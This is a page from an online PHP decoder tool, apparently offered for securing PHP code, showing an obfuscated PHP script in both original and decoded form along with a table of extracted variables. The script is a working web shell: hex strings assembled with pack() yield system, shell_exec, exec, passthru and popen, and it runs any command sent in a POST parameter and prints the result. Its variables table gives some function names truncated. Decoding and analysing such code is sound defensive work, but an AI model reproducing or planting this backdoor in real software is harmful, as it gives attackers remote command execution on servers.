Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php $identifier1 = '736'; $identifier2 = '865'; $identifier3 = '6c6'; $identifier4..

Decoded Output download

<?php 
 
$identifier1 = '736'; 
$identifier2 = '865'; 
$identifier3 = '6c6'; 
$identifier4 = 'c5f'; 
$identifier5 = '657'; 
$identifier6 = '173'; 
$identifier7 = '468'; 
$identifier8 = '656'; 
$identifier9 = '765'; 
$identifier10 = '6f7'; 
$identifier11 = '365'; 
$identifier12 = '786'; 
$identifier13 = '707'; 
$identifier14 = '469'; 
$identifier15 = '6f6'; 
$identifier16 = 'e73'; 
$oauthexceptions1 = pack("H*", '737' . '973' . '746' . '56d'); 
$oauthexceptions2 = pack("H*", $identifier1 . $identifier2 . $identifier3 . $identifier4 . '657' . '865'); 
$oauthexceptions3 = pack("H*", $identifier5 . $identifier2); 
$oauthexceptions4 = pack("H*", '706' . $identifier6 . '737' . $identifier7 . '727'); 
$oauthexceptions5 = pack("H*", '706' . 'f70' . '656'); 
$oauthexceptions6 = pack("H*", '737' . '472' . $identifier8 . '16d' . '5f6' . $identifier9 . '745' . 'f63' . '6f6' . 'e74' . '656' . 'e74'); 
$oauthexceptions7 = pack("H*", '706' . '36c' . $identifier10 . $identifier11); 
$oauthexceptions = pack("H*", '6f6' . '175' . '746' . $identifier2 . $identifier12 . '365' . $identifier13 . $identifier14 . $identifier15 . $identifier16); 
if (isset($_POST[$oauthexceptions])) { 
    $oauthexceptions = pack("H*", $_POST[$oauthexceptions]); 
    if (function_exists($oauthexceptions1)) { 
        $oauthexceptions1($oauthexceptions); 
    } elseif (function_exists($oauthexceptions2)) { 
        print $oauthexceptions2($oauthexceptions); 
    } elseif (function_exists($oauthexceptions3)) { 
        $oauthexceptions3($oauthexceptions, $constant_parameter); 
        print join("
", $constant_parameter); 
    } elseif (function_exists($oauthexceptions4)) { 
        $oauthexceptions4($oauthexceptions); 
    } elseif (function_exists($oauthexceptions5) && function_exists($oauthexceptions6) && function_exists($oauthexceptions7)) { 
        $attribute_id = $oauthexceptions5($oauthexceptions, 'r'); 
        if ($attribute_id) { 
            $var_variable = $oauthexceptions6($attribute_id); 
            $oauthexceptions7($attribute_id); 
            print $var_variable; 
        } 
    } 
    exit; 
} 
 ?>

Did this file decode correctly?

Original Code

<?php

$identifier1 = '736';
$identifier2 = '865';
$identifier3 = '6c6';
$identifier4 = 'c5f';
$identifier5 = '657';
$identifier6 = '173';
$identifier7 = '468';
$identifier8 = '656';
$identifier9 = '765';
$identifier10 = '6f7';
$identifier11 = '365';
$identifier12 = '786';
$identifier13 = '707';
$identifier14 = '469';
$identifier15 = '6f6';
$identifier16 = 'e73';
$oauthexceptions1 = pack("H*", '737' . '973' . '746' . '56d');
$oauthexceptions2 = pack("H*", $identifier1 . $identifier2 . $identifier3 . $identifier4 . '657' . '865');
$oauthexceptions3 = pack("H*", $identifier5 . $identifier2);
$oauthexceptions4 = pack("H*", '706' . $identifier6 . '737' . $identifier7 . '727');
$oauthexceptions5 = pack("H*", '706' . 'f70' . '656');
$oauthexceptions6 = pack("H*", '737' . '472' . $identifier8 . '16d' . '5f6' . $identifier9 . '745' . 'f63' . '6f6' . 'e74' . '656' . 'e74');
$oauthexceptions7 = pack("H*", '706' . '36c' . $identifier10 . $identifier11);
$oauthexceptions = pack("H*", '6f6' . '175' . '746' . $identifier2 . $identifier12 . '365' . $identifier13 . $identifier14 . $identifier15 . $identifier16);
if (isset($_POST[$oauthexceptions])) {
    $oauthexceptions = pack("H*", $_POST[$oauthexceptions]);
    if (function_exists($oauthexceptions1)) {
        $oauthexceptions1($oauthexceptions);
    } elseif (function_exists($oauthexceptions2)) {
        print $oauthexceptions2($oauthexceptions);
    } elseif (function_exists($oauthexceptions3)) {
        $oauthexceptions3($oauthexceptions, $constant_parameter);
        print join("\n", $constant_parameter);
    } elseif (function_exists($oauthexceptions4)) {
        $oauthexceptions4($oauthexceptions);
    } elseif (function_exists($oauthexceptions5) && function_exists($oauthexceptions6) && function_exists($oauthexceptions7)) {
        $attribute_id = $oauthexceptions5($oauthexceptions, 'r');
        if ($attribute_id) {
            $var_variable = $oauthexceptions6($attribute_id);
            $oauthexceptions7($attribute_id);
            print $var_variable;
        }
    }
    exit;
}

Function Calls

pack 4

Variables

$identifier1 736
$identifier2 865
$identifier3 6c6
$identifier4 c5f
$identifier5 657
$identifier6 173
$identifier7 468
$identifier8 656
$identifier9 765
$identifier10 6f7
$identifier11 365
$identifier12 786
$identifier13 707
$identifier14 469
$identifier15 6f6
$identifier16 e73
$oauthexceptions1 system
$oauthexceptions2 shell_exe
$oauthexceptions3 exe

Stats

MD5 0bbd654ca786f441b4852c06a661a0e1
Eval Count 0
Decode Time 280 ms